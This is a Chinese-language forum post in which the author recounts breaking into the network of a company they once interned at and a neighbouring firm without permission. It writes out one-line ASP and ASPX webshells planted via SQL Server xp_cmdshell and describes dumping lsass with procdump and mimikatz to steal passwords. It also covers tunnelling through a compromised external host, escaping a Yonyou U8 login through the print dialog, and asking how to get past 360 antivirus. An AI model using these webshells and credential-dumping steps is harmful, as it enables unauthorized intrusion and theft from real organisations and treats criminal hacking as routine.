事情是这样的，有一段时间在A公司实习过，就想渗透A公司，各种工具各种扫，终于发现一个注入点，拿到了后台的密码，登陆进去之后，没有利用的地方，上传点卡的特别严，即使传上图片去，能浏览图片，但是不知道图片的实际地址，没有旁站，算了，还是c段吧，引出了下边的故事。

 

御剑，wwwscan各种扫，终于。。。

 

 

B公司的网站源码，下载下来。。。

 

得到后台密码：

登陆后台，ckfinder编辑器上传图片，重命名，IIS6.0解析漏洞，webshell到手。

内网，没有数据库，估计站库分离了

672个补丁，估计系统漏洞没有了，怎么办，顺手whoami一下

百密一疏呀  我不是很喜欢直接加用户，那样动静大，还是直接在内存中抓密码吧，用procdump,感觉这个杀软不报毒，用其他的有时候杀软拦截，或者读取失败，这个一般是会成功的

上传procdump,然后

讲lsass.dmp下载下来对于win2003就在win2003下解密，对于32win8就在win7下解密，对于64位win8，就在64位下解密，通过这种方法我还没有失败过，呵呵

 

 

在win003虚拟机上

密码出来了不是一般的变态，这台控制的主机IP是192.168.0.1

由于我也是内网只能进行双向的端口反弹了

找一台以前的外网肉鸡，ip是58.215.65.xxx,执行以下命令

在192.168.0.1的网马上执行以下命令：

然后我们连一下外网肉鸡：

 

Ok连上了。。。。。。！！！！！

 

因为是内网，我就用superscan扫了一下端口，网速有点慢，毕竟转发了一下

192.168.0.1: 80

192.168.0.1: 3389

192.168.0.1: 139

192.168.0.28: 80

192.168.0.28: 139

192.168.0.28: 3306

192.168.0.29: 139

192.168.0.43: 139

192.168.0.88: 139

192.168.0.90: 3389

192.168.0.119: 80

192.168.0.119: 139

192.168.0.119: 1433

192.168.0.141: 139

192.168.0.144: 139

192.168.0.150: 139

192.168.0.164: 139

192.168.0.198: 139

192.168.0.198: 1433

192.168.0.207: 139

192.168.0.207: 80

192.168.0.207: 8080

192.168.0.209: 8080

192.168.0.253: 80

192.168.0.253: 139

192.168.0.253: 1433

192.168.0.253: 3389

192.168.0.254: 8080

 

看见253那台开了1433我就手贱试了一下

好家伙，人品不错呀，先介绍以下这台机器的信息IP192.168.0.253 x86win8

但是只能执行一些无关痛痒的命令但到加用户时就。。。

估计被拦截了，看进程

八成是360给拦下了，那个U8查了一下，是用友软件的，后边有故事，既然不让加用户，还有其他好办法，

1.       替换sethc.exe

2.          

3.       被拒了

4.       

5.       修改一下安全属性：漫长的等待之后又是未响应，估计这事只有360能干的出来

6.       

 

怎么办，映像劫持试试，意料之中。。。。。

还有办法没，因为是在局域网中，可以先建立ipc连接传输文件，将转储文件拷贝出来，就得到用户名密码了，说干就干。。

大爷的，又失败了，渗透的路很曲折啊尤其是对于win8来说，怎么办，看搭网站了没搭了的话写个一句话传procdump 执行然后将转储文件下载下来。。。。。

 

80端口果然打开了，找根路径

被拦截了，没办法，我在c:\inetpub\wwwoot\顺手写了个文件

Exec master.dbo.xp_cmdshell 'echo 1>c:\inetpub\wwwroot\1.txt '，在192.168.0.1那台肉鸡上访问（外网访问不了的），成功了，看来根目录就是c:\inetpub\wwwroot\,写一句话吧。。。

echo hello^<%eval request("a")%^> >c:\inetpub\wwwroot\12.asp,访问。。

你说气人不？？？

写个aspx的菜刀马试试呗

echo ^<%@ Page Language="Jscript" validateRequest="false" %^>^<%Response.Write(eval(Request.Item["w"],"unsafe"));%^>aspx Test oo∩_∩oo > c:\inetpub\wwwroot\1.aspx

成功了将菜刀传到

但是菜刀只能读东西没法上传文件我当时觉得这是马的问题应该再传了大马但是上传失败，我没有继续找可写目录，这个地方说是失误之处吧  

 

思路到此戛然而止，突然想到那几个账号何不试试弱口令。。

好戏开始了。。。。。。。。。。。。。。。。。。。

 

 

 

这几个账号中除了administrator很复杂外，其他密码都是账号本身，但是让我登陆进去之后

都卡死在这了，直到usciio这个账号虽然没有完全等进去但是。。。我用慢镜头播放

 

没有弱口令，首先我对用友软件不熟悉，我点帮助键，注意看

 

点打印。。。

 

点查找打印机。。。。

 

 

看到没有这样就算是进来了我们可以在地址栏或者其他地方调用各种命令

只是这个用户的权限是

各种功能受限计算机上还开起了UAC，但是这不妨碍我们写一个大马了，找可写目录写一个大马，然后用数据库的sys权限将大马移到网站根目录就可以访问了

 

 

接下来的事就简单多了在大马中找可写目录，将procdump上传到服务器，在数据库的sys权限下执行生成lsass.dmp文件，将lsass.dmp文件传回到本机，用mimitakz解密，由于目标机是32位win8，用32位win7就可以解密了，如图所示

为了这个小密码可折腾坏我了，现在正式进入，看看是什么原因不能加用户，这个地方还有点小曲折 administrator登陆过程中用友的那个登录窗口还是会拦着，这是只要按照上述方法，调出任务管理器，然后

点连接就可以登陆了，这个地方由于我已经登录进来了，所以按钮变灰了，下面我再加个用户看看到底是什么拦截了。。。。

 

如图真是360搞的鬼。至此这台机器的渗透就到这里了

但是怎么样突破360的拦截还是一个长久问题，这个只不过因为能执行部分命令所以渗透成功

这个求解答

 

 

求志同道和的同志 QQ：1563689034